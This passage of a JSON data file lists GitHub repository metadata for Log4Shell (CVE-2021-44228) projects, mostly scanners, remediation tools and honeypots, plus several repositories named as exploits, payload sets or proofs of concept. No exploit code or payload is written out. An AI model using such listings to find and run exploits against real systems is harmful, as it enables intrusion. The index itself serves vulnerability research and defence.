+ "subscribers_count": 3
+ },
+ {
+ "id": 438175327,
+ "name": "log4j2-rce-recap",
+ "full_name": "cbuschka\/log4j2-rce-recap",
+ "owner": {
+ "login": "cbuschka",
+ "id": 5462513,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5462513?v=4",
+ "html_url": "https:\/\/github.com\/cbuschka"
+ },
+ "html_url": "https:\/\/github.com\/cbuschka\/log4j2-rce-recap",
+ "description": "Little recap of the log4j2 remote code execution (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-14T08:31:47Z",
+ "updated_at": "2021-12-14T10:06:36Z",
+ "pushed_at": "2021-12-14T10:03:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "java",
+ "log4j2",
+ "rce",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438182253,
+ "name": "log4j-vulnerability-demo",
+ "full_name": "andrii-kovalenko-celonis\/log4j-vulnerability-demo",
+ "owner": {
+ "login": "andrii-kovalenko-celonis",
+ "id": 63106217,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63106217?v=4",
+ "html_url": "https:\/\/github.com\/andrii-kovalenko-celonis"
+ },
+ "html_url": "https:\/\/github.com\/andrii-kovalenko-celonis\/log4j-vulnerability-demo",
+ "description": "Endpoint to test CVE-2021-44228 – Log4j 2",
+ "fork": false,
+ "created_at": "2021-12-14T08:55:43Z",
+ "updated_at": "2021-12-14T08:57:36Z",
+ "pushed_at": "2021-12-14T08:57:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438193673,
+ "name": "Log4j-CVE-2021-44228",
+ "full_name": "dark-ninja10\/Log4j-CVE-2021-44228",
+ "owner": {
+ "login": "dark-ninja10",
+ "id": 58605984,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58605984?v=4",
+ "html_url": "https:\/\/github.com\/dark-ninja10"
+ },
+ "html_url": "https:\/\/github.com\/dark-ninja10\/Log4j-CVE-2021-44228",
+ "description": "On Thursday (December 9th), a 0-day exploit in the popular Java logging library log4j (version 2) was discovered that results in Remote Code Execution (RCE) by logging a certain string. Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it \"Log4Shell\" for short.",
+ "fork": false,
+ "created_at": "2021-12-14T09:33:22Z",
+ "updated_at": "2021-12-14T09:35:51Z",
+ "pushed_at": "2021-12-14T09:35:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438203240,
+ "name": "log4j-finder",
+ "full_name": "fox-it\/log4j-finder",
+ "owner": {
+ "login": "fox-it",
+ "id": 468621,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/468621?v=4",
+ "html_url": "https:\/\/github.com\/fox-it"
+ },
+ "html_url": "https:\/\/github.com\/fox-it\/log4j-finder",
+ "description": "Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228, CVE-2021-45046, CVE-2021-45105)",
+ "fork": false,
+ "created_at": "2021-12-14T10:04:42Z",
+ "updated_at": "2024-05-29T02:51:48Z",
+ "pushed_at": "2022-12-27T17:57:19Z",
+ "stargazers_count": 434,
+ "watchers_count": 434,
+ "has_discussions": true,
+ "forks_count": 97,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "cve-2021-45046",
+ "cve-2021-45105",
+ "log4j",
+ "log4j-finder",
+ "log4j2",
+ "log4shell",
+ "python"
+ ],
+ "visibility": "public",
+ "forks": 97,
+ "watchers": 434,
+ "score": 0,
+ "subscribers_count": 21
+ },
+ {
+ "id": 438248880,
+ "name": "JNDI-Exploit-1.2-log4shell",
+ "full_name": "34zY\/JNDI-Exploit-1.2-log4shell",
+ "owner": {
+ "login": "34zY",
+ "id": 55347142,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55347142?v=4",
+ "html_url": "https:\/\/github.com\/34zY"
+ },
+ "html_url": "https:\/\/github.com\/34zY\/JNDI-Exploit-1.2-log4shell",
+ "description": "Details : CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-14T12:42:54Z",
+ "updated_at": "2023-09-28T11:34:07Z",
+ "pushed_at": "2021-12-19T07:57:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438250402,
+ "name": "cve-2021-44228",
+ "full_name": "didoatanasov\/cve-2021-44228",
+ "owner": {
+ "login": "didoatanasov",
+ "id": 7069625,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7069625?v=4",
+ "html_url": "https:\/\/github.com\/didoatanasov"
+ },
+ "html_url": "https:\/\/github.com\/didoatanasov\/cve-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-14T12:47:56Z",
+ "updated_at": "2021-12-14T14:30:02Z",
+ "pushed_at": "2021-12-14T14:29:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438289849,
+ "name": "Security-Log4J-Tester",
+ "full_name": "ReynerGonzalez\/Security-Log4J-Tester",
+ "owner": {
+ "login": "ReynerGonzalez",
+ "id": 51517256,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51517256?v=4",
+ "html_url": "https:\/\/github.com\/ReynerGonzalez"
+ },
+ "html_url": "https:\/\/github.com\/ReynerGonzalez\/Security-Log4J-Tester",
+ "description": "The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell.",
+ "fork": false,
+ "created_at": "2021-12-14T14:46:08Z",
+ "updated_at": "2021-12-14T15:04:49Z",
+ "pushed_at": "2021-12-14T15:04:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438291572,
+ "name": "org.shaneking.demo.cve.y2021.s44228",
+ "full_name": "ShaneKingBlog\/org.shaneking.demo.cve.y2021.s44228",
+ "owner": {
+ "login": "ShaneKingBlog",
+ "id": 76613703,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76613703?v=4",
+ "html_url": "https:\/\/github.com\/ShaneKingBlog"
+ },
+ "html_url": "https:\/\/github.com\/ShaneKingBlog\/org.shaneking.demo.cve.y2021.s44228",
+ "description": "CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-14T14:51:26Z",
+ "updated_at": "2021-12-14T18:03:52Z",
+ "pushed_at": "2021-12-14T18:03:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438299030,
+ "name": "log4j",
+ "full_name": "wortell\/log4j",
+ "owner": {
+ "login": "wortell",
+ "id": 54625905,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54625905?v=4",
+ "html_url": "https:\/\/github.com\/wortell"
+ },
+ "html_url": "https:\/\/github.com\/wortell\/log4j",
+ "description": "Repo containing all info, scripts, etc. related to CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-14T15:13:06Z",
+ "updated_at": "2024-03-21T04:34:22Z",
+ "pushed_at": "2021-12-29T19:46:22Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 438349219,
+ "name": "CVE-2021-44228-Scanner",
+ "full_name": "municipalparkingservices\/CVE-2021-44228-Scanner",
+ "owner": {
+ "login": "municipalparkingservices",
+ "id": 3780687,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3780687?v=4",
+ "html_url": "https:\/\/github.com\/municipalparkingservices"
+ },
+ "html_url": "https:\/\/github.com\/municipalparkingservices\/CVE-2021-44228-Scanner",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-14T17:53:37Z",
+ "updated_at": "2021-12-14T17:58:15Z",
+ "pushed_at": "2021-12-14T17:54:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 438353510,
+ "name": "log4j-honeypot-flask",
+ "full_name": "BinaryDefense\/log4j-honeypot-flask",
+ "owner": {
+ "login": "BinaryDefense",
+ "id": 10130449,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10130449?v=4",
+ "html_url": "https:\/\/github.com\/BinaryDefense"
+ },
+ "html_url": "https:\/\/github.com\/BinaryDefense\/log4j-honeypot-flask",
+ "description": "Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-14T18:08:45Z",
+ "updated_at": "2024-05-12T04:11:58Z",
+ "pushed_at": "2021-12-20T14:44:27Z",
+ "stargazers_count": 147,
+ "watchers_count": 147,
+ "has_discussions": false,
+ "forks_count": 24,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 24,
+ "watchers": 147,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 438369987,
+ "name": "Log4jTools",
+ "full_name": "MalwareTech\/Log4jTools",
+ "owner": {
+ "login": "MalwareTech",
+ "id": 7256561,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7256561?v=4",
+ "html_url": "https:\/\/github.com\/MalwareTech"
+ },
+ "html_url": "https:\/\/github.com\/MalwareTech\/Log4jTools",
+ "description": "Tools for investigating Log4j CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-14T19:08:14Z",
+ "updated_at": "2024-05-10T10:43:33Z",
+ "pushed_at": "2021-12-23T21:03:08Z",
+ "stargazers_count": 95,
+ "watchers_count": 95,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 95,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 438375603,
+ "name": "log4jail",
+ "full_name": "mufeedvh\/log4jail",
+ "owner": {
+ "login": "mufeedvh",
+ "id": 26198477,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26198477?v=4",
+ "html_url": "https:\/\/github.com\/mufeedvh"
+ },
+ "html_url": "https:\/\/github.com\/mufeedvh\/log4jail",
+ "description": "A firewall reverse proxy for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks.",
+ "fork": false,
+ "created_at": "2021-12-14T19:29:11Z",
+ "updated_at": "2023-06-30T21:38:46Z",
+ "pushed_at": "2021-12-14T21:14:33Z",
+ "stargazers_count": 24,
+ "watchers_count": 24,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 24,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 438390351,
+ "name": "log4shellpoc",
+ "full_name": "guerzon\/log4shellpoc",
+ "owner": {
+ "login": "guerzon",
+ "id": 44284609,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44284609?v=4",
+ "html_url": "https:\/\/github.com\/guerzon"
+ },
+ "html_url": "https:\/\/github.com\/guerzon\/log4shellpoc",
+ "description": "Simple Spring Boot application vulnerable to CVE-2021-44228 (a.k.a log4shell)",
+ "fork": false,
+ "created_at": "2021-12-14T20:27:26Z",
+ "updated_at": "2023-02-21T10:56:02Z",
+ "pushed_at": "2021-12-17T23:47:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "jndi-exploit",
+ "log4j",
+ "log4j2",
+ "penetration-testing",
+ "proof-of-concept"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438406090,
+ "name": "CVE-2021-44228_PoC",
+ "full_name": "ab0x90\/CVE-2021-44228_PoC",
+ "owner": {
+ "login": "ab0x90",
+ "id": 36925640,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36925640?v=4",
+ "html_url": "https:\/\/github.com\/ab0x90"
+ },
+ "html_url": "https:\/\/github.com\/ab0x90\/CVE-2021-44228_PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-14T21:32:42Z",
+ "updated_at": "2024-05-26T16:14:37Z",
+ "pushed_at": "2021-12-15T11:23:38Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438409343,
+ "name": "log4j-remediation-tools",
+ "full_name": "stripe\/log4j-remediation-tools",
+ "owner": {
+ "login": "stripe",
+ "id": 856813,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/856813?v=4",
+ "html_url": "https:\/\/github.com\/stripe"
+ },
+ "html_url": "https:\/\/github.com\/stripe\/log4j-remediation-tools",
+ "description": "Tools for remediating the recent log4j2 RCE vulnerability (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-14T21:47:04Z",
+ "updated_at": "2024-04-16T04:41:12Z",
+ "pushed_at": "2023-03-21T09:51:33Z",
+ "stargazers_count": 42,
+ "watchers_count": 42,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "log4j2",
+ "remediation",
+ "tools"
+ ],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 42,
+ "score": 0,
+ "subscribers_count": 9
+ },
+ {
+ "id": 438417506,
+ "name": "log4jshield",
+ "full_name": "xsultan\/log4jshield",
+ "owner": {
+ "login": "xsultan",
+ "id": 231387,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/231387?v=4",
+ "html_url": "https:\/\/github.com\/xsultan"
+ },
+ "html_url": "https:\/\/github.com\/xsultan\/log4jshield",
+ "description": "Log4j Shield - fast ⚡, scalable and easy to use Log4j vulnerability CVE-2021-44228 finder and patcher",
+ "fork": false,
+ "created_at": "2021-12-14T22:22:15Z",
+ "updated_at": "2022-10-22T16:18:12Z",
+ "pushed_at": "2021-12-23T04:50:38Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "cve-2021-45046",
+ "log4j",
+ "log4j2",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438418716,
+ "name": "log4shell-finder",
+ "full_name": "HynekPetrak\/log4shell-finder",
+ "owner": {
+ "login": "HynekPetrak",
+ "id": 8593983,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8593983?v=4",
+ "html_url": "https:\/\/github.com\/HynekPetrak"
+ },
+ "html_url": "https:\/\/github.com\/HynekPetrak\/log4shell-finder",
+ "description": "Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-17571, CVE-2022-23305, CVE-2022-23307 ... ) instances of log4j library. Excellent performance and low memory footprint.",
+ "fork": false,
+ "created_at": "2021-12-14T22:27:14Z",
+ "updated_at": "2024-05-16T10:24:36Z",
+ "pushed_at": "2023-06-21T11:37:03Z",
+ "stargazers_count": 37,
+ "watchers_count": 37,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2017-5645",
+ "cve-2019-17571",
+ "cve-2020-9488",
+ "cve-2021-4104",
+ "cve-2021-42550",
+ "cve-2021-44228",
+ "cve-2021-44832",
+ "cve-2021-45046",
+ "cve-2021-45105",
+ "cve-2022-23302",
+ "cve-2022-23305",
+ "cve-2022-23307",
+ "log4j",
+ "log4j2",
+ "log4shell",
+ "scanner",
+ "security",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 37,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 438423480,
+ "name": "CVE-2021-44228",
+ "full_name": "0xThiebaut\/CVE-2021-44228",
+ "owner": {
+ "login": "0xThiebaut",
+ "id": 46688461,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46688461?v=4",
+ "html_url": "https:\/\/github.com\/0xThiebaut"
+ },
+ "html_url": "https:\/\/github.com\/0xThiebaut\/CVE-2021-44228",
+ "description": "CVE-2021-44228 Response Scripts",
+ "fork": false,
+ "created_at": "2021-12-14T22:50:05Z",
+ "updated_at": "2021-12-15T00:30:22Z",
+ "pushed_at": "2021-12-15T00:27:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438432868,
+ "name": "CVE-2021-44228_scanner",
+ "full_name": "CERTCC\/CVE-2021-44228_scanner",
+ "owner": {
+ "login": "CERTCC",
+ "id": 37221555,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37221555?v=4",
+ "html_url": "https:\/\/github.com\/CERTCC"
+ },
+ "html_url": "https:\/\/github.com\/CERTCC\/CVE-2021-44228_scanner",
+ "description": "Scanners for Jar files that may be vulnerable to CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-14T23:33:51Z",
+ "updated_at": "2024-05-25T21:23:38Z",
+ "pushed_at": "2022-03-23T18:12:51Z",
+ "stargazers_count": 344,
+ "watchers_count": 344,
+ "has_discussions": false,
+ "forks_count": 89,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 89,
+ "watchers": 344,
+ "score": 0,
+ "subscribers_count": 35
+ },
+ {
+ "id": 438449548,
+ "name": "CVE-2021-44228-Log4j-Payloads",
+ "full_name": "CrackerCat\/CVE-2021-44228-Log4j-Payloads",
+ "owner": {
+ "login": "CrackerCat",
+ "id": 17995064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4",
+ "html_url": "https:\/\/github.com\/CrackerCat"
+ },
+ "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-44228-Log4j-Payloads",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-15T00:55:12Z",
+ "updated_at": "2023-08-15T12:50:50Z",
+ "pushed_at": "2021-12-14T12:49:56Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 438469082,
+ "name": "log4j_scanner",
+ "full_name": "dbzoo\/log4j_scanner",
+ "owner": {
+ "login": "dbzoo",
+ "id": 1550399,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1550399?v=4",
+ "html_url": "https:\/\/github.com\/dbzoo"
+ },
+ "html_url": "https:\/\/github.com\/dbzoo\/log4j_scanner",
+ "description": "Fast filesystem scanner for CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-15T02:29:34Z",
+ "updated_at": "2022-01-09T18:17:10Z",
+ "pushed_at": "2022-01-10T14:52:40Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 438469428,
+ "name": "CVE-2021-44228_scanner",
+ "full_name": "jeremyrsellars\/CVE-2021-44228_scanner",
+ "owner": {
+ "login": "jeremyrsellars",
+ "id": 1396319,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1396319?v=4",
+ "html_url": "https:\/\/github.com\/jeremyrsellars"
+ },
+ "html_url": "https:\/\/github.com\/jeremyrsellars\/CVE-2021-44228_scanner",
+ "description": "Aims to find JndiLookup.class in nearly any directory or zip, jar, ear, war file, even deeply nested.",
+ "fork": false,
+ "created_at": "2021-12-15T02:31:14Z",
+ "updated_at": "2021-12-15T22:30:35Z",
+ "pushed_at": "2021-12-15T22:30:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438480170,
+ "name": "C1-WS-LOG4SHELL",
+ "full_name": "JustinDPerkins\/C1-WS-LOG4SHELL",
+ "owner": {
+ "login": "JustinDPerkins",
+ "id": 60413733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60413733?v=4",
+ "html_url": "https:\/\/github.com\/JustinDPerkins"
+ },
+ "html_url": "https:\/\/github.com\/JustinDPerkins\/C1-WS-LOG4SHELL",
+ "description": "Quick Deploy to show case cve-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-15T03:20:25Z",
+ "updated_at": "2021-12-17T17:07:45Z",
+ "pushed_at": "2021-12-17T17:07:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438490030,
+ "name": "Log4j-Updater",
+ "full_name": "VinniMarcon\/Log4j-Updater",
+ "owner": {
+ "login": "VinniMarcon",
+ "id": 42422427,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42422427?v=4",
+ "html_url": "https:\/\/github.com\/VinniMarcon"
+ },
+ "html_url": "https:\/\/github.com\/VinniMarcon\/Log4j-Updater",
+ "description": "Log4J Updater Bash Script to automate the framework update process on numerous machines and prevent the CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-15T04:08:15Z",
+ "updated_at": "2021-12-16T17:25:55Z",
+ "pushed_at": "2021-12-15T06:20:17Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438504265,
+ "name": "log4j-vul",
+ "full_name": "bhprin\/log4j-vul",
+ "owner": {
+ "login": "bhprin",
+ "id": 1876456,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1876456?v=4",
+ "html_url": "https:\/\/github.com\/bhprin"
+ },
+ "html_url": "https:\/\/github.com\/bhprin\/log4j-vul",
+ "description": "This project is just to show Apache Log4j2 Vulnerability - aka CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-15T05:19:13Z",
+ "updated_at": "2021-12-22T04:39:30Z",
+ "pushed_at": "2023-01-31T08:17:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438523356,
+ "name": "CVE-2021-44228",
+ "full_name": "avirahul007\/CVE-2021-44228",
+ "owner": {
+ "login": "avirahul007",
+ "id": 63554722,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63554722?v=4",
+ "html_url": "https:\/\/github.com\/avirahul007"
+ },
+ "html_url": "https:\/\/github.com\/avirahul007\/CVE-2021-44228",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-15T06:40:35Z",
+ "updated_at": "2021-12-15T06:40:35Z",
+ "pushed_at": "2021-12-15T06:40:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438541418,
+ "name": "log4j-log4shell-playground",
+ "full_name": "rgl\/log4j-log4shell-playground",
+ "owner": {
+ "login": "rgl",
+ "id": 43356,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43356?v=4",
+ "html_url": "https:\/\/github.com\/rgl"
+ },
+ "html_url": "https:\/\/github.com\/rgl\/log4j-log4shell-playground",
+ "description": "A playground for poking at the Log4Shell (CVE-2021-44228) vulnerability mitigations",
+ "fork": false,
+ "created_at": "2021-12-15T07:51:12Z",
+ "updated_at": "2021-12-16T11:59:53Z",
+ "pushed_at": "2021-12-15T08:44:16Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "log4j",
+ "log4shell"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438541504,
+ "name": "how-to-check-patch-secure-log4j-CVE-2021-44228",
+ "full_name": "anuvindhs\/how-to-check-patch-secure-log4j-CVE-2021-44228",
+ "owner": {
+ "login": "anuvindhs",
+ "id": 46879183,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46879183?v=4",
+ "html_url": "https:\/\/github.com\/anuvindhs"
+ },
+ "html_url": "https:\/\/github.com\/anuvindhs\/how-to-check-patch-secure-log4j-CVE-2021-44228",
+ "description": "A one-stop repo\/ information hub for all log4j vulnerability-related information.",
+ "fork": false,
+ "created_at": "2021-12-15T07:51:28Z",
+ "updated_at": "2022-03-17T16:19:51Z",
+ "pushed_at": "2022-01-14T05:38:05Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j",
+ "vulnerability-detection"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438593574,
+ "name": "Get-log4j-Windows.ps1",
+ "full_name": "KeysAU\/Get-log4j-Windows.ps1",
+ "owner": {
+ "login": "KeysAU",
+ "id": 38932932,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38932932?v=4",
+ "html_url": "https:\/\/github.com\/KeysAU"
+ },
+ "html_url": "https:\/\/github.com\/KeysAU\/Get-log4j-Windows.ps1",
